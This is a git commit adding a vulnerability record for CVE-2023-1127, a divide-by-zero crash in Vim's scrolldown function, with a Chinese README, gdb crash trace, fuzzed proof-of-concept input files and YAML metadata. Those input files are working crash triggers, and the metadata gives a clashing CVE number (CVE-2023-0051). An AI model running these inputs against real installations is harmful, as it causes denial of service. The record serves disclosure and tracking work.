添加CVE-2023-1127漏洞信息

2023-03-22 14:57:31 +08:00 · 2023-03-22 14:57:31 +08:00 · 31a68df5f7
parent b575c9d13f
commit 31a68df5f7
6 changed files with 187 additions and 0 deletions
--- a/cve/vim/2023/CVE-2023-1127/README.md
+++ b/cve/vim/2023/CVE-2023-1127/README.md
@ -0,0 +1,156 @@
 # 描述
 在move.c的scrolldown函数中存在除以0漏洞(move.c:1739)
 # 影响版本
 ```
 git log
 commit ea62cee85e9e77ec86edd9843926dadb69978753 (HEAD -> master, tag: v9.0.1327, origin/master, origin/HEAD)
 Author: Bram Moolenaar <Bram@vim.org>
 Date:   Sun Feb 19 18:36:41 2023 +0000
    patch 9.0.1327: cursor in wrong position below line with virtual text below
    Problem:    Cursor in wrong position below line with virtual text below ending
                in multi-byte character.
    Solution:   When checking for last character take care of multi-byte
                character.
 ```
 # Proof of Concept
 ```
 ./vim -u NONE -i NONE -n -m -X -Z -e -s -S poc
 Floating point exception
 ```
 # DEBUG
 ```
 gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S poc
 GNU gdb (Ubuntu 12.0.90-0ubuntu1) 12.0.90
 Copyright (C) 2022 Free Software Foundation, Inc.
 License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
 This is free software: you are free to change and redistribute it.
 There is NO WARRANTY, to the extent permitted by law.
 Type "show copying" and "show warranty" for details.
 This GDB was configured as "x86_64-linux-gnu".
 Type "show configuration" for configuration details.
 For bug reporting instructions, please see:
 <https://www.gnu.org/software/gdb/bugs/>.
 Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.
 For help, type "help".
 Type "apropos word" to search for commands related to "word"...
 Reading symbols from ./vim...
 gdb-peda$ r
 Starting program: /home/user/vim/src/vim -u NONE -i NONE -n -m -X -Z -e -s -S poc
 [Thread debugging using libthread_db enabled]
 Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
 Program received signal SIGFPE, Arithmetic exception.
 Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated.
 Use 'set logging enabled off'.
 Warning: 'set logging on', an alias for the command 'set logging enabled', is deprecated.
 Use 'set logging enabled on'.
 [----------------------------------registers-----------------------------------]
 RAX: 0x8
 RBX: 0x7fffffff57c0 --> 0x1
 RCX: 0xfffffff8 --> 0x0
 RDX: 0x0
 RSI: 0x1
 RDI: 0x62500001e100 --> 0x3eb
 RBP: 0x7fffffff5c00 --> 0x7fffffff5d50 --> 0x7fffffff6010 --> 0x7fffffff62f0 --> 0x7fffffff6c30 --> 0x7fffffff6c60 (--> ...)
 RSP: 0x7fffffff5780 --> 0x41b58ab3
 RIP: 0x555555c052fa (<scrolldown+7594>: idiv   DWORD PTR [rbx+0x3dc])
 R8 : 0x10007fff68ef --> 0x0
 R9 : 0x2
 R10: 0xffffffffffffffff
 R11: 0x6c ('l')
 R12: 0x7fffffffdf78 --> 0x7fffffffe321 ("/home/user/vim/src/vim")
 R13: 0x555556219fb0 (<main>:    push   rbp)
 R14: 0x55555634bae8 --> 0x5555557e16b0 (<asan.module_dtor>: push   rbp)
 R15: 0x7ffff7ffd040 --> 0x7ffff7ffe2e0 --> 0x555555554000 --> 0x10102464c457f
 EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
 [-------------------------------------code-------------------------------------]
   0x555555c052ed <scrolldown+7581>:    jle    0x555555c0531f <scrolldown+7631>
   0x555555c052f3 <scrolldown+7587>:    mov    eax,DWORD PTR [rbx+0x3c0]
   0x555555c052f9 <scrolldown+7593>:    cdq
 => 0x555555c052fa <scrolldown+7594>:    idiv   DWORD PTR [rbx+0x3dc]
   0x555555c05300 <scrolldown+7600>:    add    eax,DWORD PTR [rbx+0x3bc]
   0x555555c05306 <scrolldown+7606>:    mov    DWORD PTR [rbx+0x3bc],eax
   0x555555c0530c <scrolldown+7612>:    mov    eax,DWORD PTR [rbx+0x3c0]
   0x555555c05312 <scrolldown+7618>:    cdq
 [------------------------------------stack-------------------------------------]
 0000| 0x7fffffff5780 --> 0x41b58ab3
 0008| 0x7fffffff5788 --> 0x55555628b24c ("1 32 8 10 first:1599")
 0016| 0x7fffffff5790 --> 0x555555c03550 (<scrolldown>:  push   rbp)
 0024| 0x7fffffff5798 --> 0x100000000 --> 0x0
 0032| 0x7fffffff57a0 --> 0x62500000a420 --> 0x1
 0040| 0x7fffffff57a8 --> 0x0
 0048| 0x7fffffff57b0 --> 0x62500000a428 --> 0x0
 0056| 0x7fffffff57b8 --> 0x5555561388be (<may_trigger_win_scrolled_resized+2510>:   lea    rsp,[rbp-0x8])
 [------------------------------------------------------------------------------]
 Legend: code, data, rodata, value
 Stopped reason: SIGFPE
 0x0000555555c052fa in scrolldown (line_count=0x0, byfold=0x0) at move.c:1739
 1739            row += col / width2;
 gdb-peda$ p width2
 $1 = 0x0
 gdb-peda$ bt
 #0  0x0000555555c052fa in scrolldown (line_count=0x0, byfold=0x0) at move.c:1739
 #1  0x0000555555c20b33 in check_scrollbind (topline_diff=0x0, leftcol_diff=0x0) at normal.c:1943
 #2  0x00005555562238b2 in main_loop (cmdwin=0x1, noexmode=0x0) at main.c:1390
 #3  0x0000555555a4c17a in open_cmdwin () at ex_getln.c:4549
 #4  0x0000555555a3bfd2 in getcmdline_int (firstc=0x3a, count=0x1, indent=0x0, clear_ccline=0x1) at ex_getln.c:1938
 #5  0x0000555555a38809 in getcmdline (firstc=0x3a, count=0x1, indent=0x0, do_concat=GETLINE_CONCAT_CONT) at ex_getln.c:1554
 #6  0x0000555555a4101d in getexline (c=0x3a, cookie=0x0, indent=0x0, options=GETLINE_CONCAT_CONT) at ex_getln.c:2843
 #7  0x00005555559e2bc3 in do_cmdline (cmdline=0x0, fgetline=0x555555a40f90 <getexline>, cookie=0x0, flags=0x0) at ex_docmd.c:876
 #8  0x0000555555c30b82 in nv_colon (cap=0x7fffffff7e60) at normal.c:3176
 #9  0x0000555555c1478b in normal_cmd (oap=0x7fffffff8440, toplevel=0x1) at normal.c:938
 #10 0x0000555555a14a8d in exec_normal (was_typed=0x0, use_vpeekc=0x0, may_use_terminal_loop=0x0) at ex_docmd.c:8887
 #11 0x0000555555a146b4 in exec_normal_cmd (cmd=0x611000000a48 "\\fn0ndwPPPP\\021\\rWPP0rm0<", '0' <repeats 13 times>, remap=0x0, silent=0x0)
    at ex_docmd.c:8850
 #12 0x0000555555a14422 in ex_normal (eap=0x7fffffff89a0) at ex_docmd.c:8768
 #13 0x00005555559ef8b0 in do_one_cmd (cmdlinep=0x7fffffff9e40, flags=0x7, cstack=0x7fffffff9e60, fgetline=0x555555e0e7b0 <getsourceline>,
    cookie=0x7fffffffae60) at ex_docmd.c:2580
 #14 0x00005555559e3675 in do_cmdline (cmdline=0x611000000540 "noaoco\\001\\rr\\027\\027normnorm:", fgetline=0x555555e0e7b0 <getsourceline>,
    cookie=0x7fffffffae60, flags=0x7) at ex_docmd.c:993
 #15 0x0000555555e0c5a4 in do_source_ext (fname=0x602000006153 "poc", check_other=0x0, is_vimrc=0x0, ret_sid=0x0, eap=0x0, clearvars=0x0)
    at scriptfile.c:1759
 #16 0x0000555555e0a0d1 in do_source (fname=0x602000006153 "poc", check_other=0x0, is_vimrc=0x0, ret_sid=0x0) at scriptfile.c:1905
 #17 0x0000555555e09c20 in cmd_source (fname=0x602000006153 "poc", eap=0x7fffffffb820) at scriptfile.c:1250
 #18 0x0000555555e0971e in ex_source (eap=0x7fffffffb820) at scriptfile.c:1276
 #19 0x00005555559ef8b0 in do_one_cmd (cmdlinep=0x7fffffffccc0, flags=0xb, cstack=0x7fffffffcce0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2580
 #20 0x00005555559e3675 in do_cmdline (cmdline=0x602000002710 "so poc", fgetline=0x0, cookie=0x0, flags=0xb) at ex_docmd.c:993
 #21 0x00005555559e6771 in do_cmdline_cmd (cmd=0x602000002710 "so poc") at ex_docmd.c:587
 #22 0x0000555556222b5d in exe_commands (parmp=0x555556e0ac00 <params>) at main.c:3146
 #23 0x000055555622095b in vim_main2 () at main.c:782
 #24 0x000055555621a56f in main (argc=0xd, argv=0x7fffffffdf78) at main.c:433
 #25 0x00007ffff7c45d90 in __libc_start_call_main (main=main@entry=0x555556219fb0 <main>, argc=argc@entry=0xd, argv=argv@entry=0x7fffffffdf78)
    at ../sysdeps/nptl/libc_start_call_main.h:58
 #26 0x00007ffff7c45e40 in __libc_start_main_impl (main=0x555556219fb0 <main>, argc=0xd, argv=0x7fffffffdf78, init=<optimized out>, fini=<optimized out>,
    rtld_fini=<optimized out>, stack_end=0x7fffffffdf68) at ../csu/libc-start.c:392
 #27 0x0000555555721a75 in _start ()
 gdb-peda$ list
 1734            col -= width1;
 1735            ++row;
 1736        }
 1737        if (col > width2)
 1738        {
 1739            row += col / width2;
 1740            col = col % width2;
 1741        }
 1742        if (row >= curwin->w_height)
 1743        {
 ```
 [poc](https://drive.google.com/file/d/1m30Vl9KgAZ2JNeRKzvbdlQohybd3RWte/view?usp=sharing)
 # 影响
 可以导致DoS，内存修改，或者可能的远程执行
--- a/cve/vim/2023/CVE-2023-1127/poc
+++ b/cve/vim/2023/CVE-2023-1127/poc
--- a/cve/vim/2023/CVE-2023-1127/poc2
+++ b/cve/vim/2023/CVE-2023-1127/poc2
@ -0,0 +1,6 @@
 wi0 0
 no0 L
 sil0norm0
 sil0norm00000:se!no
sil0no++++&32+++32nnnnnnnnnnnnnnnnnnnnnnnnnnn 0 10no 0 :H
 diffs:H
 dif:H
--- a/cve/vim/2023/CVE-2023-1127/poc3
+++ b/cve/vim/2023/CVE-2023-1127/poc3
@ -0,0 +1,5 @@
 wi0 0
 no0 L
 sil0norm0
 sil0norm00000:se!no
 sil0norm
--- a/cve/vim/2023/yaml/CVE-2023-1127.yaml
+++ b/cve/vim/2023/yaml/CVE-2023-1127.yaml
@ -0,0 +1,19 @@
 id: CVE-2023-1127
 source: https://huntr.dev/bounties/2d4d309e-4c96-415f-9070-36d0815f1beb/
 info:
  name: Vim是一款基于UNIX平台的编辑器。
  severity: high
  description: |
    GitHub存储库vim/vim在9.0.1367版本存在除以零漏洞。
  scope-of-influence:
    vim < 9.0.1367
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1127
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 7.8
    cve-id: CVE-2023-0051
    cwe-id: CWE-369
    cnvd-id: None
    kve-id: None
  tags: cve2023, 除零错误
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@ -107,6 +107,7 @@ cve:
    - CVE-2023-0051
    - CVE-2023-0054
    - CVE-2023-0512
    - CVE-2023-1127
  openssl:
    - CVE-2022-1292
    - CVE-2022-2274